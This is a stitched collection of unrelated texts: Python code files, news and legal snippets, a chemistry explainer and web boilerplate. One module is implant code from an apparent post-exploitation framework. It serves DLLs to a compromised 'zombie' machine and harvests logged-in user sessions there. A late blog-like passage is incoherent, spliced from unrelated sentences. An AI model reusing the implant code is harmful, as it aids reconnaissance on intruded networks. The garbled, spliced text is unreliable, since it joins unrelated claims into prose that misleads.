def waiting_for_translation(self, model):
""" Flag doesn't display if translation prepared
"""
flags = ''
for item in settings.LANGUAGES:
if not Page_translation.objects.filter(page_id=model.id, lang=item[0]):
flags += """<img src="/static/themes/""" + settings.MYSMILE_THEME + \
"""/images/flags/""" + item[0] + """.png" alt= " """ + \
item[1] + """ "/>"""
return flags
waiting_for_translation.short_description = 'waiting for translation'
waiting_for_translation.allow_tags = True
def get_list_display(self, request):
"""
        Hide empty columns "photo_thumb" and "waiting_for_translation"
"""
pages = Page.objects.all().count()
pages_translation = Page_translation.objects.all().count()
pages_blankphoto = Page.objects.filter(photo='').count()
self.list_display = ('slug', 'status', 'ptype', 'sortorder',)
if pages_blankphoto < pages: # at least one photo exist
self.list_display += ('photo_thumb', )
if pages*len(settings.LANGUAGES) != pages_translation:
self.list_display += ('waiting_for_translation',)
return self.list_display + ('date_update',)
def get_fieldsets(self, request, obj=None):
fieldsets = super(PageAdmin, self).get_fieldsets(request, obj)
if obj:
photo = Page.objects.filter(id=obj.id).values_list('photo', flat=True)[0]
if photo:
fieldsets = [('Settings', {'fields': ['slug', 'status', 'ptype', 'sortorder',
'color', ('photo', 'photo_thumb')]}), ]
else:
fieldsets = [('Settings', {'fields': ['slug', 'status', 'ptype', 'sortorder',
'color', ('photo',)]}), ]
return fieldsets
admin.site.register(Page, PageAdmin)
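# Note: `allow_tags = True` (used above on waiting_for_translation) was
# deprecated in Django 1.9 and removed in Django 2.0. On newer versions the
# same effect is achieved by returning safe markup instead, e.g. (a sketch,
# not part of the original code):
#
# from django.utils.html import format_html
# flags += format_html('<img src="/static/themes/{}/images/flags/{}.png" alt="{}"/>',
#                      settings.MYSMILE_THEME, item[0], item[1])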
|
“There is no political necessity to keep Canada in the new NAFTA deal. If we don't make a fair deal for the US after decades of abuse, Canada will be out,” Trump tweeted on Saturday, a day after the trade negotiations with Canada were upended by leaked off-the-record remarks he made to Bloomberg.
Trump, who has repeatedly branded the North American Free Trade Agreement (NAFTA) the “worst trade deal ever made,” reiterated that he will not back down from his pledge to quit the deal, if his concerns are not met. “We make new deal or go back to pre-NAFTA!” he tweeted.
Trump previously set a deadline for Friday to reach the trilateral deal. When the US-Canada trade talks eventually missed the deadline, US Trade Representative Robert Lighthizer said that Trump had asked Congress to approve the bilateral agreement with Mexico, notifying lawmakers of his intention within the three-month period prescribed by the law.
Moving ahead towards securing the trade deal with Mexico does not mean Washington is ceasing attempts to agree a deal with Canada, Lighthizer noted. “Our officials are continuing to work toward agreement,” he said, adding that the talks will be resumed on Wednesday.
The NAFTA was signed by Canada, Mexico, and the United States in 1993 and came into force in 1994, during the presidency of Bill Clinton. The longstanding trilateral deal was roundly criticized by the protectionist right, as well as the anti-globalization left, particularly for the damage that eliminating tariffs did to the American auto industry.
Without the impediment of tariffs, auto manufacturers moved their operations south of the border, wreaking havoc on former manufacturing hubs like Detroit, Michigan, and Cleveland, Ohio. According to a study on the deal effects back in 2013, NAFTA was directly responsible for raising the US trade deficit with Mexico from $17 billion to $177 billion, and cost the US over 850,000 jobs.
In June this year, Washington introduced a 25-percent tariff on steel imports and a 10-percent tariff on aluminum imports from Mexico, Canada and the EU. Mexico swiftly retaliated with import tariffs on some American goods, including steel, apples and pork. Ottawa introduced retaliatory taxes on US imports of steel, aluminum and such goods as whiskey, orange juice and other food products.
|
# Copyright (C) 2012 Statoil ASA, Norway.
#
# The file 'sched_file.py' is part of ERT - Ensemble based Reservoir Tool.
#
# ERT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ERT is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html>
# for more details.
from ert.cwrap import BaseCClass, CWrapper
from ert.sched import SCHED_LIB
from ert.util import CTime
class SchedFile(BaseCClass):
def __init__(self, filename, start_time):
c_ptr = SchedFile.cNamespace().parse(filename, CTime(start_time))
super(SchedFile, self).__init__(c_ptr)
@property
def length(self):
""" @rtype: int """
return SchedFile.cNamespace().length(self)
def write(self, filename, num_dates, add_end=True):
SchedFile.cNamespace().write(self, num_dates, filename, add_end)
def free(self):
SchedFile.cNamespace().free(self)
cwrapper = CWrapper(SCHED_LIB)
cwrapper.registerType("sched_file", SchedFile)
cwrapper.registerType("sched_file_obj", SchedFile.createPythonObject)
cwrapper.registerType("sched_file_ref", SchedFile.createCReference)
SchedFile.cNamespace().parse = cwrapper.prototype("c_void_p sched_file_parse_alloc( char*, time_t )")
SchedFile.cNamespace().write = cwrapper.prototype("void sched_file_fprintf_i( sched_file , int , char* , bool)")
SchedFile.cNamespace().length = cwrapper.prototype("int sched_file_get_num_restart_files( sched_file )")
SchedFile.cNamespace().free = cwrapper.prototype("void sched_file_free( sched_file )")
|
Buy any Hankook car, van or 4×4 tyre at an Eden Tyres & Servicing branch before the 31st March 2019 for your chance to win!
The first prize includes 2 x VIP tickets to watch Real Madrid at the Santiago Bernabeu Stadium with flights and hotel accommodation. Second prize is an Xbox One X with FIFA 19 and weekly runners up will win a Real Madrid Shirt and football.
The competition is open to any customer buying a Hankook tyre from a participating retailer. Each customer will be given a card showing a unique reference number for each tyre purchased. To enter the competition, the customer will need to log onto real-madrid.uk.hankook.win, enter the unique reference number shown on the card, register their name and contact details and answer the question shown on the card. The customer will receive an automated email acknowledging and confirming the entry via the website.
The customer must retain their unique reference number card and receipt in order to claim their prize.
Customers entering the competition in accordance with the above conditions will be entered into a draw to win two VIP Real Madrid tickets. The winner will be notified by telephone or email, using the contact details provided when registering to enter.
Two VIP Hospitality tickets to see a Real Madrid match at the Santiago Bernabéu stadium. The tickets, date and time of the match will be chosen at Hankook Tyres’ discretion.
One night’s accommodation for the winner and one guest in a hotel selected by Hankook Tyres on a Bed & Breakfast basis sharing one twin or double room. The winner will require a current debit or credit card with sufficient funds available in order to check in at the hotel for security deposit purposes and for any additional room charges.
The prize does not include transport to and from any airport, meals or drinks (other than those specified), excursions, attractions, treatments, car hire, travel insurance, personal expenses, visa, vaccinations and any other costs not specified as part of the prize.
The winner’s guest must be 18 years or older. The winner and their guest must hold a current passport valid for a minimum of six months on the date of departure from the UK. The winner is also responsible for obtaining any other relevant travel documentation required to travel to and gain entry to Spain, including adequate insurance without limitation covering overseas medical costs and ensure the travelling party adheres to the travel itinerary and other relevant safety instructions as set out by Hankook Tyres.
The winner must provide passport details for both themselves and their guest. The winner is responsible for informing Hankook Tyres of any wheelchair or special requirements for the winner and/or their guest and for ensuring they adhere to any applicable health and safety guidelines. The winner and their guest shall also comply with all local Spanish laws.
The winner acknowledges that Hankook Tyres will have no responsibility and is not obliged to offer any alternative prize if the Real Madrid game does not take place for any reason, or if any flight arranged by Hankook Tyres is cancelled, postponed or delayed for whatever reason. No alternative prize will be offered if the winner or their guest is unable, for whatever reason, to travel.
The winner or their guest must not be subject to any football banning orders or past convictions related to football hooliganism. Hankook Tyres reserve the right to conduct checks against the prize winners in such circumstances.
The winner may be required to take part in promotional activity related to the prize draw and shall participate in that activity at Hankook’s reasonable request. By entering the competition, you consent to Hankook Tyres using your name, photograph, voice and image for publicity purposes in any medium and in advertising, marketing and promotional material without additional compensation or prior notice. This consent applies both before and after the prize draw takes place for an unlimited time.
Additionally, all valid entries will be entered in a draw at the end of the promotion for a 2nd prize to win an Xbox One X with FIFA 19 and weekly draws, where the winners will be awarded a Real Madrid football and shirt. Each winner will be notified by phone call or email using the contact details which they used to enter. If the prize is not claimed within 14 days after this call or email, the prize will be withdrawn.
|
import core.implant
import core.job
import string
import uuid
class UserHunterJob(core.job.Job):
def create(self):
self.fork32Bit = True
self.options.set("DLLUUID", uuid.uuid4().hex)
self.options.set("MANIFESTUUID", uuid.uuid4().hex)
self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"'))
def report(self, handler, data, sanitize = False):
data = data.decode('latin-1')
task = handler.get_header(self.options.get("UUIDHEADER"), False)
if task == self.options.get("DLLUUID"):
handler.send_file(self.options.get("DYNWRAPXDLL"))
return
if task == self.options.get("MANIFESTUUID"):
handler.send_file(self.options.get("DYNWRAPXMANIFEST"))
return
if len(data) == 0:
handler.reply(200)
return
if data == "Complete":
super(UserHunterJob, self).report(handler, data)
elif "***" in data:
self.parse_sessions_data(data)
handler.reply(200)
def parse_sessions_data(self, data):
self.print_good("Session data retrieved")
sessions = data.split("***")
for session in sessions:
if session:
user = session.split(":")[0]
if "$" in user:
continue # not concerned with machine accounts
comps = ", ".join(list(set(session.split(":")[1].split(","))))
self.shell.print_plain(user + " => " + comps)
self.results += user + " => " + comps + "\n"
def done(self):
self.display()
def display(self):
pass
# try:
# self.print_good(self.data)
# except:
# pass
class UserHunterImplant(core.implant.Implant):
NAME = "User Hunter"
DESCRIPTION = "Identifies and locates all logged in users"
AUTHORS = ["TheNaterz"]
STATE = "implant/gather/user_hunter"
def load(self):
self.options.register("DIRECTORY", "%TEMP%", "writeable directory on zombie", required=False)
self.options.register("DYNWRAPXDLL", "data/bin/dynwrapx.dll", "relative path to dynwrapx.dll", required=True, advanced=True)
self.options.register("DYNWRAPXMANIFEST", "data/bin/dynwrapx.manifest", "relative path to dynwrapx.manifest", required=True, advanced=True)
self.options.register("UUIDHEADER", "ETag", "HTTP header for UUID", advanced=True)
self.options.register("DLLUUID", "", "HTTP header for UUID", hidden=True)
self.options.register("MANIFESTUUID", "", "UUID", hidden=True)
def job(self):
return UserHunterJob
def run(self):
workloads = {}
workloads["js"] = "data/implant/gather/user_hunter.js"
self.dispatch(workloads, self.job)
|
On May 26, 2015, the Departments of Health and Human Services, Labor, and Treasury, jointly released the twenty-seventh set of FAQs on Affordable Care Act implementation issues. The FAQs clarify the application of the ACA’s out-of-pocket limit rules for plan years beginning in 2016.
In February, HHS “clarified” that the ACA’s out-of-pocket limits apply to each individual, even those enrolled in family coverage. For example, suppose an employee and spouse enroll in family coverage with an annual out-of-pocket limit of $13,000, and during the 2016 plan year, the spouse has $10,000 of out-of-pocket expenses and the employee has $3,000. Under the new rule, the spouse’s out-of-pocket expenses are capped at the individual limit of $6,850 (with the remaining $3,150 being covered by the plan). The employee is still subject to cost sharing, however, until the $13,000 plan limit is reached.
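To make the arithmetic concrete, the interaction of the two limits can be sketched in a few lines of Python (a sketch only; the $6,850 and $13,000 figures come from the example above, and how a particular plan allocates cost sharing once the family limit is reached will vary):

def member_cost_sharing(expenses, individual_limit=6850, family_limit=13000):
    """Cap each member at the embedded individual limit, then cap the family
    total at the family limit (proportional scaling past the family limit is
    purely illustrative)."""
    capped = [min(e, individual_limit) for e in expenses]
    total = sum(capped)
    if total <= family_limit:
        return capped
    return [c * family_limit / total for c in capped]

# Spouse with $10,000 in expenses, employee with $3,000:
print(member_cost_sharing([10000, 3000]))  # -> [6850, 3000]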
The FAQs confirm that HHS’ clarification applies to all non-grandfathered group health plans, including large group and self-insured plans. Meaning, starting with 2016 plan years, all non-grandfathered plans must contain an embedded individual out-of-pocket limit for family coverage. For these purposes, family coverage includes any tier of coverage other than employee-only.
The FAQs also confirm that these rules apply to high-deductible health plans (HDHPs). The embedded out-of-pocket limit rules do not impact HSA-qualified HDHPs, as a family HDHP will not be required to start paying medical claims under the ACA out-of-pocket rule until the minimum annual deductible for family HDHP coverage is satisfied. In other words, by the time the embedded individual out-of-pocket limit is reached, the employee will have satisfied the minimum annual deductible for HDHP coverage.
|
from django.conf import settings
from django.conf.urls import include, patterns, url
from django.contrib import admin
from django.shortcuts import redirect
from django.views.decorators.cache import cache_page
from django.views.i18n import javascript_catalog
admin.autodiscover()
handler403 = 'amo.views.handler403'
handler404 = 'amo.views.handler404'
handler500 = 'amo.views.handler500'
urlpatterns = patterns('',
# AMO homepage or Marketplace Developer Hub? Choose your destiny.
url('^$', settings.HOME, name='home'),
# Add-ons.
('', include('addons.urls')),
# Tags.
('', include('tags.urls')),
# Files
('^files/', include('files.urls')),
# AMO admin (not django admin).
('^admin/', include('zadmin.urls')),
# App versions.
('pages/appversions/', include('applications.urls')),
# Services
('', include('amo.urls')),
# Paypal
('^services/', include('paypal.urls')),
# Javascript translations.
url('^jsi18n.js$', cache_page(60 * 60 * 24 * 365)(javascript_catalog),
{'domain': 'javascript', 'packages': ['zamboni']}, name='jsi18n'),
# Redirect persona/xxx
('^getpersonas$',
lambda r: redirect('http://www.getpersonas.com/gallery/All/Popular',
permanent=True)),
url('^persona/(?P<persona_id>\d+)', 'addons.views.persona_redirect',
name='persona'),
# Redirect top-tags to tags/top
('^top-tags/?',
lambda r: redirect('tags.top_cloud', permanent=True)),
('^addons/contribute/(\d+)/?$',
lambda r, id: redirect('addons.contribute', id, permanent=True)),
)
if settings.TEMPLATE_DEBUG:
# Remove leading and trailing slashes so the regex matches.
media_url = settings.MEDIA_URL.lstrip('/').rstrip('/')
urlpatterns += patterns('',
(r'^%s/(?P<path>.*)$' % media_url, 'django.views.static.serve',
{'document_root': settings.MEDIA_ROOT}),
)
if settings.SERVE_TMP_PATH and settings.DEBUG:
urlpatterns += patterns('',
(r'^tmp/(?P<path>.*)$', 'django.views.static.serve',
{'document_root': settings.TMP_PATH}),
)
|
Benedict’s test is used to test for carbohydrates and to distinguish reducing from non-reducing sugars. The test detects reducing sugars (monosaccharides and some disaccharides), which have a free ketone or aldehyde group. Benedict’s solution can also be used to test for the presence of glucose in urine.
Some sugars, such as glucose, are called reducing sugars because they are capable of transferring hydrogen (electrons) to other compounds, a process called reduction. When reducing sugars are mixed with Benedict’s reagent and heated, a reduction reaction causes the reagent to change color. The color varies from green to dark (brick) red or rusty brown, depending on the amount and type of sugar.
Benedict’s quantitative reagent contains potassium thiocyanate and is used to determine how much reducing sugar is present in a sample. This test forms copper thiocyanate, which is white and can be used in a titration. The titration should be repeated with a 1% glucose solution instead of the specimen for calibration.
The test was named after the American chemist Stanley Benedict. Benedict’s reagent (frequently sold as Benedict’s Qualitative Solution or Benedict’s Solution) is a chemical reagent.
Benedict’s reagent is commonly used to identify the presence of reducing sugars, although other reducing substances also give a positive reaction. These include all monosaccharides and numerous disaccharides, including lactose and maltose.
More generally, Benedict’s test will detect the presence of aldehydes and alpha-hydroxy-ketones, including those that occur in certain ketoses. Thus, although the ketose fructose is not strictly a reducing sugar, it is an alpha-hydroxy-ketone and gives a positive test because it is converted to the aldoses glucose and mannose by the base in the reagent.
The principle of this test is quite simple: when reducing sugars are heated in the presence of an alkali, they are converted to powerful reducing species known as enediols. Enediols reduce the cupric ions (Cu2+) present in Benedict’s reagent to cuprous ions (Cu+), which precipitate as insoluble red copper oxide (Cu2O).
The color of the precipitate gives an idea of the amount of sugar present, so the test is semi-quantitative. A greenish color indicates around 0.5 g% concentration, yellow indicates 1 g%, orange indicates 1.5 g% and red indicates 2 g% or higher.
In short, when reducing sugars are heated in an alkaline medium they form the powerful reducing species enediol, which reduces the cupric ions in Benedict’s solution to cuprous ions; this is how the presence of reducing compounds is detected. Note that Benedict’s reagent reacts not only with reducing sugars but also gives a positive result with other reducing substances.
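As a quick illustration of the semi-quantitative scale described above, the color-to-concentration mapping can be written as a simple lookup in Python (approximate values only; the exact reading depends on the protocol followed):

BENEDICT_SCALE = {
    'blue': 0.0,    # reagent unchanged: no reducing sugar
    'green': 0.5,   # roughly 0.5 g%
    'yellow': 1.0,  # roughly 1 g%
    'orange': 1.5,  # roughly 1.5 g%
    'red': 2.0,     # 2 g% or higher
}
print(BENEDICT_SCALE['orange'])  # -> 1.5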
The procedure for this test is one of the simplest in the field of biological testing. Only a little equipment is needed: a test tube, Benedict’s solution and the sample solution. Once you have all of these, proceed with the following steps.
Take a test tube and pour 5 ml of your Benedict’s solution into it.
Once you have poured in the Benedict’s solution, add 5 to 8 drops of the sample solution to the test tube.
Gently heat the solution after the sample has been added.
What will the results be? You will find out after reading the precautions.
Before performing any scientific test, there are precautions that must be taken. If you fail to take these particular precautions, there is always a chance that your test will fail.
The quantity of Benedict’s solution is very important. Before performing the test, measure the Benedict’s solution and make sure that you are using the right amount.
Heating the mixture should be a gentle procedure. Don’t try to be quick; just keep it slow and steady.
When adding the sample solution, make sure that you add only a few drops. Adding too much solution could ruin the whole process.
While heating the solution, make sure the mouth of the test tube is not facing anyone, because on boiling, droplets could escape the test tube and burn the skin of anyone they touch.
The last point is very important: if you don’t get a result the first time you boil, do it again. You may not get a result on the first heating but do get one after heating twice or three times.
If all these precautions are followed, your test should go smoothly.
Sorry to have kept you waiting for the results. Now, what will happen, and what are the possible outcomes of Benedict’s test? How will you know whether the test you are performing is negative or positive? The results and observations are as follows.
If the sugar is reducing, the solution will change color after the heating process. This will not necessarily happen after heating just once; as mentioned in the precautions, try heating twice or more, and this may bring results.
If after heating the solution once, twice or three times the color remains the same, the sugar in the solution is non-reducing.
So that was all for a very easy test to check for reducing sugar in a solution. Did our article help you in your studies? Leave us your feedback in the comments section and stay tuned to our website!
|
import pyglet.window
import pyglet.image
class IsoRenderer(object):
""" Renders a 3D view of a map
"""
cam_rx, cam_ry, cam_rz = 45, 0, 0
cam_x, cam_y, cam_z = 0, 0, -1000
w, h = 640, 480
far = 10000
fov = 60
def __init__(self):
self.load_map()
self.create_window()
self.setup_gl_params()
def create_window(self):
self.window = pyglet.window.Window(fullscreen=False, resizable=True)
self.window.width=1280
self.window.height=800
self.window.on_resize=self.resize_view
def setup_gl_params(self):
pyglet.gl.glEnable(pyglet.gl.GL_BLEND)
pyglet.gl.glBlendFunc(pyglet.gl.GL_SRC_ALPHA, pyglet.gl.GL_ONE_MINUS_SRC_ALPHA)
pyglet.gl.glDepthFunc(pyglet.gl.GL_LEQUAL)
pyglet.gl.glEnable(pyglet.gl.GL_LINE_SMOOTH)
pyglet.gl.glHint(pyglet.gl.GL_LINE_SMOOTH_HINT, pyglet.gl.GL_DONT_CARE)
    def load_map(self):
        """ Load the map image and keep its texture for rendering.
        """
        map_img = pyglet.image.load('img.gif')
        self.map_tex = map_img.get_texture()
def draw_map(self):
pyglet.gl.glPushMatrix()
pyglet.gl.glTranslatef(-512, 0, 512)
pyglet.gl.glRotatef(-90, 1.0, 0.0, 0.0)
self.map_tex.blit(0, 0, 0, 1024, 1024)
pyglet.gl.glPopMatrix()
pyglet.gl.glColor4f(1.0, 0.0, 0.0, 1)
        pyglet.gl.glLineWidth(1.5)
pyglet.gl.glBegin(pyglet.gl.GL_LINE_LOOP)
pyglet.gl.glVertex3f(512, 0, 512)
pyglet.gl.glVertex3f(-512, 0, 512)
pyglet.gl.glVertex3f(-512, 0, -512)
pyglet.gl.glVertex3f(512, 0, -512)
pyglet.gl.glEnd()
pyglet.gl.glColor4f(1.0, 1.0, 1.0, 1)
def render(self):
self.window.dispatch_events()
pyglet.gl.glClear(pyglet.gl.GL_COLOR_BUFFER_BIT | pyglet.gl.GL_DEPTH_BUFFER_BIT)
self.apply_camera()
self.draw_map()
self.window.flip()
def apply_camera(self):
pyglet.gl.glLoadIdentity()
pyglet.gl.glTranslatef(self.cam_x, self.cam_y, self.cam_z)
pyglet.gl.glRotatef(self.cam_rx,1,0,0)
pyglet.gl.glRotatef(self.cam_ry,0,1,0)
pyglet.gl.glRotatef(self.cam_rz,0,0,1)
def resize_view(self, width, height):
self.w,self.h=width,height
pyglet.gl.glViewport(0, 0, width, height)
pyglet.gl.glMatrixMode(pyglet.gl.GL_PROJECTION)
pyglet.gl.glLoadIdentity()
pyglet.gl.gluPerspective(self.fov, float(self.w)/self.h, 0.1, self.far)
pyglet.gl.glMatrixMode(pyglet.gl.GL_MODELVIEW)
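
# A minimal driver loop (hypothetical usage; the original entry point is not
# shown, and an 'img.gif' texture must exist in the working directory):
if __name__ == '__main__':
    renderer = IsoRenderer()
    while not renderer.window.has_exit:
        renderer.render()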
|
Your IP address (this is your computer’s individual identification number) is automatically logged by our web server. This is used to note your interest in our website. It is also possible that we will use your IP address to help diagnose problems on our web site. By submitting your information you consent to the use of that information as set out in this policy. If for any reason our policy does change, we will post the changes on this page so you can view them. If changes occur with which you are unhappy, you can email us and instruct us to no longer use your information.
Aerial Vision will not be liable for damages arising out of or in connection with the use of this site in any way. This is a comprehensive limitation of liability that applies to all damages of any kind, including (without limitation) compensatory, direct, indirect, or consequential damages, loss of data, income or profit, loss of or damage to property and claims of third parties.
You may come across hyper-links on this site. These hyper-links may take you to sites operated by other organisations which we are not responsible for. When preparing our website we have taken every care possible. However, we have no control over any of the information you can access via other web sites. Therefore, no mention of any organisation, company, or individual to which our web site is linked shall imply any approval or warranty as to the standing and capability of any such organisations, company or individual on the part of Aerial Vision.
All design, text, graphics, and arrangement thereof are the copyright of Aerial Vision or of other copyright owners. Any unauthorised reproduction of the contents of this site without the prior written permission of Aerial Vision is strictly prohibited.
|
"""
.. module:: attachments
:platform: Unix, Windows
:synopsis: A module containing all attachment classes
.. moduleauthor:: Robert Grant <[email protected]>
This module contains classes for the different types of attachments.
"""
from ..api import endpoint
class Attachment:
"""Base class for attachments.
:param str type_: the type of the attachment
"""
def __init__(self, type_):
self.type = type_
def as_dict(self):
"""Return the attachment as a dictionary.
:returns: the attachment as a dictionary
:rtype: :class:`dict`
"""
return self.__dict__
class GenericAttachment(Attachment):
"""A generic attachment.
This attachment accepts any keyword arguments, but must be given a
particular type.
:param str type: the type of attachment
"""
def __init__(self, type, **kwargs):
super().__init__(type)
for k, v in kwargs.items():
setattr(self, k, v)
class Image(Attachment):
"""An image attachemnt.
Image attachments do not contain an image. Instead, they specify a URL from
which the image can be downloaded and must have a domain of
"i.groupme.com". Such URLs are known as "i" URLs, and are from the GroupMe
image service.
.. note::
Use the direct initializer *if and only if* the image already has a
known GroupMe image service URL. Otherwise, use the
:func:`~groupy.object.attachments.Image.file` method.
:param str url: the URL at which the image can be fetched from the GroupMe
image service
:param str source_url: the original URL of the image (optional)
"""
def __init__(self, url, source_url=None):
super().__init__('image')
self.url = url
self.source_url = source_url
def __repr__(self):
return "Image(url={!r})".format(self.url)
@classmethod
def file(cls, image):
"""Upload an image file and return it as an attachment.
:param image: the file containing the image data
:type image: :class:`file`
:returns: an image attachment
:rtype: :class:`~groupy.object.attachments.Image`
"""
return cls(endpoint.Images.create(image)['url'])
def download(self):
"""Download the image data of the image attachment.
:returns: the actual image the image attachment references
:rtype: :class:`PIL.Image.Image`
"""
return endpoint.Images.download(self.url)
class Location(Attachment):
"""An attachment that specifies a geo-location.
In addition to latitude and longitude, every location attachment also
specifies a name. Some (especially older) location attachments also contain
a ``foursquare_venue_id`` attribute.
:param str name: the location name
:param float lat: the latitude
:param float lng: the longitude
:param str foursquare_venue_id: the FourSquare venue ID (optional)
"""
def __init__(self, name, lat, lng, foursquare_venue_id=None):
super().__init__('location')
self.name = name
self.lat = lat
self.lng = lng
self.foursquare_venue_id = foursquare_venue_id
def __repr__(self):
return "Location(name={!r}, lat={!r}, lng={!r})".format(
self.name, self.lat, self.lng)
class Emoji(Attachment):
"""An attachment containing emoticons.
Emoji attachments do not contain any emoticon images. Instead, a
placeholder specifies the location of the emoticon in the text, and a
``charmap`` facilitates translation into the emoticons.
:param str placeholder: a high-point/invisible character indicating the
position of the emoticon
:param list charmap: a list of lists containing pack IDs and offsets
"""
def __init__(self, placeholder, charmap):
super().__init__('emoji')
self.placeholder = placeholder
self.charmap = charmap
def __repr__(self):
return "Emoji(placeholder={!r}, charmap={!r})".format(
self.placeholder, self.charmap)
class Split(Attachment):
"""An attachment containing information for splitting a bill.
    This type of attachment is deprecated. However, such attachments are still
present in older messages.
:param str token: the token that splits the bill
"""
def __init__(self, token):
super().__init__('split')
self.token = token
def __repr__(self):
return "Split(token={!r})".format(self.token)
class Mentions(Attachment):
"""An attachment that specifies "@" mentions.
Mentions are a new addition to the types of attachments. Each contains two
parallel lists: ``user_ids`` and ``loci``. The elements in ``loci`` specify
the start index and length of the mention, while the elements in
``user_ids`` specify by user_id which user was mentioned in the
corresponding element of ``loci``.
.. note::
The length of ``user_ids`` must be equal to the length of ``loci``!
:param list user_ids: a list of user IDs
:param list loci: a list of ``(start, length)`` elements
"""
def __init__(self, user_ids, loci=None):
super().__init__('mentions')
self.user_ids = user_ids
self.loci = loci
def __repr__(self):
return "Mentions({!r})".format(self.user_ids)
class AttachmentFactory:
"""A factory for creating attachments from dictionaries.
"""
_factories = {
'image': Image,
'location': Location,
'emoji': Emoji,
'mentions': Mentions,
'split': Split
}
@classmethod
def create(cls, **kwargs):
"""Create and return an attachment.
:param str type: the type of attachment to create; if unrecognized, a
generic attachment is returned
:returns: a subclass of :class:`~groupy.object.attachments.Attachment`
"""
t = kwargs.pop('type', None)
try:
return cls._factories[t](**kwargs)
except (TypeError, KeyError):
            # Either kwargs contained an unexpected keyword for attachment type
            # t, or t is not a known attachment type.
return GenericAttachment(t, **kwargs)
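
# Example usage (illustrative; values are made up):
#
# attachment = AttachmentFactory.create(type='location', name='HQ',
#                                       lat=40.75, lng=-73.99)
# attachment.as_dict()
# # -> {'type': 'location', 'name': 'HQ', 'lat': 40.75, 'lng': -73.99,
# #     'foursquare_venue_id': None}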
|
SANTA CLARA, Calif., August 04, 2006 — SolutionSoft Systems, Inc., a leading provider of Intelligent Data Optimization (IDO) solutions, is pleased to announce the release of Time Machine for AIX 5L™ version 5.3, IBM’s latest UNIX operating system.
Time Machine® is a patent-pending software application designed to facilitate testing and simulation of specified system dates and times without modifying or resetting the system clock. This allows defined applications and users to run under any future date, past date or time zone desired while the underlying system time remains unchanged. With this ability, Time Machine proves itself a powerful tool for performing “what-if” testing on system resources and programs. Time Machine’s unique solution for user-based time morphing on Unix and Windows servers allows test environments to simultaneously run up to 20,000 individually defined virtual clocks at once, and supports both group and user level time offsets.
“This release of Time Machine provides Solution-Soft with the ability to meet the ever-growing needs of our customers that rely on IBM’s server platforms and WebSphere environments to meet their respective application roll-outs, as well as keep on track with their software enhancements,” said Michael Morrison, Director of Business Development at Solution-Soft.
|
# -*- coding: utf-8 -*-
import Tkinter as tk
import thread
import logging
class Application(tk.Frame):
def __init__(self, cube, master=None):
tk.Frame.__init__(self, master)
self.grid()
self.createWidgets()
self.cube = cube
def createWidgets(self):
self.quitButton = tk.Button(self, text='Tag Event',
command=self.onTag)
self.quitButton.grid()
self.tagStr = tk.StringVar()
self.userEntry = tk.Entry(self,textvariable=self.tagStr)
self.tagStr.set('USER:giloux@localhost:giloux')
self.userEntry.grid()
def onTag(self):
self.cube.tag_detection('NFC',self.userEntry.get())
def start_simulator(title, cube):
app = Application(cube)
app.master.title(title)
app.mainloop()
def init(cube, params):
logging.info("Launching NFC simulator thread")
thread.start_new_thread(start_simulator,('NFC Simulator', cube))
#start_simulator()
|
Growing up in a small city in southern Poland, part of a religious family and conservative community, Maciej Gosniowski was told again and again that something was wrong with him. “It would be better if I changed myself,” he recalled teachers telling him. “It would be better if I behaved more like a boy. It would make my life easier.” Mr. Gosniowski was beaten by other students who used homophobic slurs he did not yet understand.
|
import sys
import os
import pylab as plt
import time
temp = plt.linspace(.6, 1.28, 20)
temp = [temp[-1]]  # keep only the last temperature; temp[20] would raise IndexError for a 20-element array
ID = int(sys.argv[0].split('ID')[1].split('.py')[0])
print ID
print temp
for i in range(0,len(temp)):
#if i %4 != ID:
# continue
t=time.time()
print '%d of %d'%(i,len(temp))
    # Run RG_fn.py 25 times at this temperature (previously 25 copy-pasted calls).
    for _ in range(25):
        os.system('python RG_fn.py %f' % temp[i])
elapsed = time.time()-t
print(elapsed)
|
A mama groundhog and her brood have torn up this flowerbed. We don’t have the guts to evict them. Karen Wodke, thanks for stopping by my hub. One thing we did wrong was agree that we’d clear out everything around the yard. This man wanted even the trellis we had for flowers removed. There was an old outhouse on the property he wanted removed; we refused. The boathouse had items in it he insisted be removed that should have been left with the boathouse. Here are some highlights of current items, and I always take custom requests when time permits. Your insurer will ask you for an estimated value of your contents. However, pricey items, usually those ranging from £1,000 to £2,000, need to be separately listed to be covered on many policies. Costly purchases such as laptops and jewellery (including engagement rings) may not be covered if they were bought after your policy was taken out.
Hello, would you be interested in contributing some of your advice on our website as well? We’d be happy to have you featured in a guest article. I’m a work-from-home mom living my dream, and I know it can be done! All you need to do is set your mind on the task and work towards it with drive and passion. I promise you, it can be done, if you’re ready! There aren’t many good jobs available, and even for minimum-wage jobs employers are being way too picky. It’s kind of like the housing bubble, but for employers; when is it going to crash? I mean, needing a college degree to be a dog walker? Or a food-handling certificate for Subway? Give me a break!
I wish we could have bought out my brother’s half of my mother’s 1978 ranch, because it was well insulated and solidly built by a good contractor, a personal friend of my family. However, it is 100 miles away and I wasn’t able to retire at the time. It was in very good shape but starting to deteriorate after being empty for four years, and it could not wait five more years for me to retire. I would love to find another just like it. Oh my, there are tears in my eyes! I don’t know how you got through this lens, but I am so grateful that you did. My girl Tidbit is 12 and so far has no sight issues, but now I know the symptoms to look for from here on out. Thank you for sharing your knowledge of blind dogs. Blessings and a bit of sunshine!
Whether you’re planning on doing professional video or just want to record home videos, here are a few good camcorders for the money you can spend. Usually, when we go away, there’s little in the fridge, so we turn it down; that is, turn the dial to a higher number to make it warmer. No need for it to work so hard to cool a nearly empty fridge. The ABI says people shouldn’t rush into throwing away damaged items, unless they’re a hazard to their health. Items may be able to be repaired or restored; your insurer will be able to give you more information on this.
One approach is trial and error, to see if altering the order in 2) can improve the speed with which you access the cheapest quotes. As for the boys’ bedroom, we placed the brown molding about 20 inches below the ceiling line. We didn’t really measure at first; we just eyeballed it and marked where we thought it was pleasing to us. Then we used a laser level and blue tape to mark the line around the perimeter of the room. Once we painted above and below the tape, we removed the tape and nailed the trim over the bare tape line. A fairly easy and quick project!
|
#!/usr/bin/python
# Copyright (c) 2018 Red Hat, Inc.
